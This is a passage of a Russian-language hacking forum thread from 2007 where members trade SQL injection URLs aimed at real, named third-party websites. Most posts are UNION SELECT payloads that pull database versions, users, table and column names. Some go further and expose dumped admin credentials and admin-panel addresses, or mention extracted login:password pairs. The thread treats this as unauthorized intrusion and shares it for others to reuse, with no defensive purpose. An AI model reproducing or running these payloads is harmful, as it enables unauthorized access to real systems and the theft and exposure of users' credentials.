SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    PHP:
    http://www.proflit.ru/book.php?id=-1+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,version()/*

    Первая на сегодня)))
     
    1 person likes this.
  2. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    в mysql.user доступа нет
    Code:
    http://www.rickardliljeberg.com/blog.php?itemID=1+and+1=-1+union+select+1,2,3,4,5,user(),7,8/*
     
  3. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    2 Colkru
    http://forum.antichat.ru/threadnav21336-85-10.html
    пост номер 847 =)
    upd//
    Code:
    http://www.iconla.com/gallery.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17+from+INFORMATION_SCHEMA.TABLES+limit+21,1/*
    ничего интересного =\
     
    #823 Spyder, 10 Mar 2007
    Last edited: 10 Mar 2007
    2 people like this.
  4. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9

    Сорри, тогда вот 5-ая версия:

    PHP:
    http://www.sju.ca/people2.php?id=-1+union+select+1,2,table_name,version(),null,6,7,8,9,10,11,12,13,14,15,16+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*
     
    1 person likes this.
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    не смог колонки подобрать 0_о
     
  6. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    колонка юзера - uname
    пасс не подобрал :p
     
  7. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    таблицы :
    admin
    admin_user
    admin_user2
    admin_user_allow
    admin_intra
    admin_intra_acc

    Чё то у меня сегодня проблемы с колонками 0о
     
    1 person likes this.
  8. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    PHP:
    http://www.uprava.org/section.php?id=34'
    http://www.shamray.ru/show.php?id=31'
     
  9. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    ___
     
    2 people like this.
  10. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    2 Spyder Да пусть выкладывает- тебе мешает чтоли? он выклдывает мы подбираем, какие проблемы
    http://www.uprava.org/section.php?id=34+UNION+SELECT+1,2,3,4,5,6,VERSION()--
     
    #830 Constantine, 10 Mar 2007
    Last edited: 10 Mar 2007
    1 person likes this.
  11. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    2KP0t_f!nd
    колонки бы хоть подобрал..
    http://www.uprava.org/section.php?id=-1+union+select+1,2,3,4,5,6,7/*
    http://www.shamray.ru/show.php?id=-1+union+select+user()/* - вывод в титле
     
    3 people like this.
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    оффтоп
    2 KPOT_f!nd
    вот нафиг выкладывать ссылки с кавычками. Составляй запрос, а если не умеешь - читай статьи
    хакеры млин
    и не надо удалять
     
  13. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    2Spyder
    я бы посоветовал тебе почитать статьи
    вот тебе все колонки
    Code:
    http://www.migaweb.de/downloads.php?id=-10+union+select+null,null,null,null,null,null,null,COLUMN_NAME,null,null+FROM+INFORMATION_SCHEMA.COLUMNS/*
    если имелось ввиду те таблицы что ты написал то вот пример одной из них ;)
    Code:
    http://www.migaweb.de/downloads.php?id=-10+union+select+null,null,null,null,null,null,null,COLUMN_NAME,null,null+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=char(97,100,109,105,110)/*
     
    #833 }{0TT@БЬ)Ч, 10 Mar 2007
    Last edited: 10 Mar 2007
    1 person likes this.
  14. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    PHP:
    http://www.negotiationrussia.ru/index.php?id=-1+union+select+version(),2/*
    Таблицы не подобрал.

    PHP:
    http://prazdnik.com.ua/yslyga.php?id=-1+union+select+1,login,pass,4,5,6,7+from+user/*
    логин: Zhuk_vv
    пароль: голод
    Админка: http://www.prazdnik.com.ua/admin
     
    #834 Colkru, 10 Mar 2007
    Last edited: 10 Mar 2007
    1 person likes this.
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    2 }{0TT@БЬ)Ч
    спасибо что волнуешься за мои знания, но не стоит ;)
    2 Constantine
    я не понимаю смысла просто 0о
    jmajor:chicken
    админка
    есть возможность заливки картинок
     
  16. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.kinovdom.ru/item.php?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
    Code:
    http://www.grandtour.ru/cgi-bin/hotels.cgi?country=%D4%F0%E0%ED%F6%E8%FF&id=-1+union+select+1,2,3,4,version(),user(),database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
     
    3 people like this.
  17. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Code:
    http://www.ixbt.com/news/news.php?id=53979'
    Инет глючит, не грузит странички дальше :(
     
  18. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9

    Было это уже...

    (http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,0x707265766564203a44,4,5,6,7,8,9,10,11/*)
     
  19. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Ну извиняйте тогда :)

    Code:
    http://www.security-outlet.com/infopages/extended.php?id=-229+UNION+SELECT+1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17/*
     
    1 person likes this.
  20. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,concat(login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15+from+users/*
    чистые login:рass

    //upd:
    Code:
    http://www.proaudio.ru/product.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users/*
    в общем, столбик с паролем называется pin или что-то вроде того, не могу подобрать.. user-поля нет.
     
    #840 n1†R0x, 10 Mar 2007
    Last edited: 10 Mar 2007
Thread Status:
Not open for further replies.